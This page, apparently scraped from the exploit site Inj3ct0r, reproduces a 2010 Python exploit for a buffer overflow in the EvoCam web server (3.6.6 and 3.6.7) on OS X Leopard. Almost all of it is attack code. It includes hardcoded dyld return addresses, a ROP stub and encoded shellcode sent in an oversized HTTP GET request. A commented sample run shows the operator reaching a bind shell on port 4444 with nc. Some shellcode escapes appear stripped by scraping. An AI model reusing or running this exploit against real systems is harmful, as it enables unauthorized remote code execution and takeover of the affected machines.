Home / os / win7

OS X EvoCam Web Server 3.6.6 and 3.6.7 Buffer Overflow Explo

Posted on 01 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>OS X EvoCam Web Server 3.6.6 and 3.6.7 Buffer Overflow Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>==============================================================
OS X EvoCam Web Server 3.6.6 and 3.6.7 Buffer Overflow Exploit
==============================================================


#!/usr/bin/python
 
# Exploit Title: OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and
3.6.7
# Date: 1st June 2010
# Author: d1dn0t ( didnot __A-T__ me.com )
# Software Link: http://www.pizza.org/evocam.dmg
# Version: EvoCam 3.6.6 and 3.6.7
# Tested on: OS X 10.5.8 Intel
 
import socket
import sys
import struct
from optparse import OptionParser
 
# OS X EvoCam Web Server Buffer Overflow Exploit 3.6.6 and 3.6.7
# Tested on Leopard 10.5.8 Intel
# Paul Harrington didnot __A-T__ me.com
#
#$ ./evocam.py -H 192.168.1.28 -P 8080 -T 2
#EvoLogical EvoCam 3.6.6/7 on OS X 10.5.8 Intel HTTP Buffer Overflow Exploit
#didnot __A-T__ me.com
#Targeting EvoCam Version 3.6.7
#[+] Sending evil buffer...
#[+] Done!
#[*] Check your shell at 192.168.1.28:4444
#$ nc -v 192.168.1.28 4444
#Connection to 192.168.1.28 4444 port [tcp/krb524] succeeded!
#uname -a
#Darwin Leopard-VM.local 9.8.0 Darwin Kernel Version 9.8.0: Wed Jul 15
16:55:01 PDT 2009; root:xnu-1228.15.4~1/RELEASE_I386 i386
 
print &quot;EvoLogical EvoCam 3.6.6/7 on OS X 10.5.8 Intel HTTP Buffer Overflow
Exploit&quot;
print &quot;didnot __A-T__ me.com&quot;
 
usage =  &quot;%prog -H TARGET_HOST -P TARGET_PORT -T Target &quot;
parser = OptionParser(usage=usage)
parser.add_option(&quot;-H&quot;, &quot;--target_host&quot;, type=&quot;string&quot;, action=&quot;store&quot;,
dest=&quot;HOST&quot;, help=&quot;Destination Host&quot;)
parser.add_option(&quot;-P&quot;, &quot;--target_port&quot;, type=&quot;int&quot;, action=&quot;store&quot;,
dest=&quot;PORT&quot;, help=&quot;Destination Port&quot;)
parser.add_option(&quot;-T&quot;, &quot;--target&quot;, type=&quot;string&quot;, action=&quot;store&quot;,
dest=&quot;TARGET&quot;, help=&quot;Target Version [1=3.6.6 2=3.6.7]&quot;)
(options, args) = parser.parse_args()
HOST = options.HOST
PORT = options.PORT
 
if options.TARGET == &quot;1&quot; :
print &quot;Targeting EvoCam Version 3.6.6&quot;
 BUFLEN=1560
elif options.TARGET == &quot;2&quot; :
print &quot;Targeting EvoCam Version 3.6.7&quot;
 BUFLEN=1308
else:
BUFLEN=0
 
if not (HOST and PORT and BUFLEN):
 parser.print_help()
sys.exit()
 
# Settings for Leopard 10.5.8
WRITEABLE = 0x8fe66448
SETJMP = 0x8fe1cf38 #$ nm /usr/lib/dyld | grep &quot;setjmp&quot; #8fe1cf38 t _setjmp
STRDUP = 0x8fe210dc #$ nm /usr/lib/dyld | grep &quot;strdup&quot; #8fe210dc t _strdup
JMPEAX = 0x8fe01041 #0x8fe01041 &lt;__dyld__dyld_start+49&gt;:     jmp    *%eax
 
NOP=&quot;x90x90&quot;
 
buf = 
&quot;xdbxd2x29xc9xb1x27xbfxb1xd5xb6xd3xd9x74x24&quot; + 
&quot;xf4x5ax83xeaxfcx31x7ax14x03x7axa5x37x43xe2&quot; + 
&quot;x05x2exfcx45xd5x11xadx17x65xf0x80x18x8ax71&quot; + 
&quot;x64x19x94x75x10xdfxc6x27x70x88xe6xc5x65x14&quot; + 
&quot;x6fx2axefxb4x3cxfbxa2x04xaaxcexc3x17x4dx83&quot; + 
&quot;x95x85x21x49xd7xaax33xd0xb5xf8xe5xbex89xe3&quot; + 
&quot;xc4xbfx98x4fx5fx78x6dxabxdcx6cx8fx08xb1x25&quot; + 
&quot;xc3x3ex6fx07x63x4cxccx14x9fxb2xa7xebx51x75&quot; + 
&quot;x17x5cxc2x25x27x67x2fx45xd7x08x93x6bxa2x21&quot; + 
&quot;x5cx31x81xb2x1fx4cx19xc7x08x80xd9x77x5fxcd&quot; + 
&quot;xf6x04xf7x79x27x89x6ex14xbexaex21xb8x93x60&quot; + 
&quot;x72x03xdex01x43xb4xb0x88x47x64x60xd8xd7xd5&quot; + 
&quot;x30xd9x1ax55x01x26xf4x06x21x6bx75xac&quot;
 
FRAG0 = &quot;x90&quot; + &quot;x58&quot; + &quot;x61&quot; + &quot;xc3&quot;
FRAG1 = &quot;x90&quot; + &quot;x58&quot; + &quot;x89xe0&quot; + &quot;x83xc0x0e&quot;  + &quot;x89x44x24x08&quot;
+ &quot;xc3&quot; # 0C is a bad character
 
STUB =  
FRAG0 + 
 struct.pack('&lt;III',SETJMP,WRITEABLE+32,WRITEABLE) + 
FRAG1 + 
 'A'*20 +
struct.pack('&lt;IIIII',SETJMP,WRITEABLE+24,WRITEABLE,STRDUP,JMPEAX) + 
 'A'*4
 
BUFFER = &quot;A&quot;*BUFLEN + STUB + NOP + buf
 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((HOST,PORT))
print '[+] Sending evil buffer...'
s.send(&quot;GET &quot; +BUFFER + &quot; HTTP/1.0

&quot;)
print &quot;[+] Done!&quot;
print &quot;[*] Check your shell at %s:4444 &quot; % HOST
s.close()


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-01]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :